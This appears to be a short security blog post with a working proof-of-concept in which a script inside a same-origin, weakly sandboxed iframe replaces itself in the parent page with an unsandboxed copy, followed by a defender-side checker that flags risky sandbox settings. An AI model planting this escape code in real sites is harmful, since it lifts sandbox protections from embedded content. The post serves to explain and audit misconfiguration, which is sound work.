Manipulating iframes dynamically PoC

October 17, 2024

This proof-of-concept demonstrates how an iframe can be dynamically manipulated and replaced from within, but it does not bypass browser security restrictions.

The technique shown here only works if the iframe is not strictly sandboxed—specifically, if it has the allow-same-origin and allow-scripts permissions, or if it is not sandboxed at all.

If the iframe is sandboxed without these permissions, browser security policies will prevent the script from accessing or modifying the parent document, and this code will not work.

POC for manipulating iframes

Below is a demonstration of how a script running inside an iframe can find and replace itself in the parent document, if the browser's sandbox restrictions are not enforced or are misconfigured. This is not a universal sandbox escape, but it does show why careful sandboxing is important.

<!DOCTYPE html>
<html>
<head>
    <title>PoC - iframe sandbox breakout</title>
</head>
<body>
    <script>
        // Runs inside the framed document. It only succeeds when the frame is
        // same-origin with the parent and either not sandboxed or sandboxed with
        // allow-scripts and allow-same-origin; otherwise parent.document throws.
        const escape = () => {
            document.body.innerText = "poc iframe sandbox breakout.";

            let parent = window.parent;

            // Find the iframe element in the parent that contains this window
            let container = Array.from(parent.document.getElementsByTagName('iframe'))
                .find(iframe => iframe.contentWindow === window);

            // The replacement frame loads this same page, so stop once we are
            // already running inside it; otherwise the replacement repeats forever
            if (container && container.id === "escapedTheIframe") {
                return;
            }

            if (container) {
                // Insert a fresh iframe with the same URL but without the original's
                // sandbox attribute, then remove the original
                let replacement = parent.document.createElement("iframe");
                replacement.setAttribute("src", window.location.href);
                replacement.setAttribute("id", "escapedTheIframe");
                parent.document.body.append(replacement);
                container.parentNode.removeChild(container);
                parent.alert("broke out of the iframe sandbox poc - ian");
            } else {
                alert("Could not find the containing iframe - ian");
            }
        };

        escape();
    </script>
</body>
</html>
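The PoC depends on one precondition: a same-origin frame whose sandbox either is absent or grants both allow-scripts and allow-same-origin. The following is an added defender-side check (not part of the original PoC or the linked repository) that inspects iframe tags in markup and flags frames meeting that precondition; the sample markup is constructed for this example.

```javascript
// Both tokens together let same-origin framed content script the parent,
// which is the precondition the PoC above relies on.
const RISKY_PAIR = ["allow-scripts", "allow-same-origin"];

// Parse a sandbox attribute value (ASCII case-insensitive, space-separated
// tokens). `null` models an <iframe> that has no sandbox attribute at all.
function parseSandbox(value) {
  if (value === null || value === undefined) return null;
  return new Set(value.trim().toLowerCase().split(/\s+/).filter(Boolean));
}

// Decide whether a same-origin framed document's scripts could reach
// window.parent.document under this sandbox value.
function assessSandbox(sandboxValue) {
  const tokens = parseSandbox(sandboxValue);
  if (tokens === null) {
    return { parentReachable: true, reason: "no sandbox attribute" };
  }
  if (RISKY_PAIR.every(t => tokens.has(t))) {
    return { parentReachable: true,
             reason: "allow-scripts plus allow-same-origin keeps the real origin" };
  }
  if (!tokens.has("allow-scripts")) {
    return { parentReachable: false, reason: "scripts are disabled in the frame" };
  }
  return { parentReachable: false, reason: "frame runs with an opaque origin" };
}

// Lightweight scan of markup for <iframe> tags (regex-based, for constructed
// input; a real audit should walk a proper HTML parse tree).
function auditIframes(html) {
  const findings = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = m[1];
    const src = (attrs.match(/\bsrc\s*=\s*"([^"]*)"/i) || [])[1] || "";
    const sb = attrs.match(/\bsandbox(?:\s*=\s*"([^"]*)")?/i);
    // A bare `sandbox` attribute means "all restrictions", so map it to "".
    const value = sb ? (sb[1] ?? "") : null;
    findings.push({ src, sandbox: value, ...assessSandbox(value) });
  }
  return findings;
}

// Constructed sample: two configurations the PoC works against, two it does not.
const SAMPLE_HTML = `
<iframe src="/widget.html"></iframe>
<iframe src="/widget.html" sandbox="allow-scripts allow-same-origin"></iframe>
<iframe src="/widget.html" sandbox="allow-scripts"></iframe>
<iframe src="/widget.html" sandbox></iframe>`;
```

Running auditIframes(SAMPLE_HTML) reports the first two frames as reachable from the framed script and the last two as not, which is exactly the split the text above describes.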

[Image: iframe manipulation PoC]

https://github.com/Vagebondcur/iframe-escape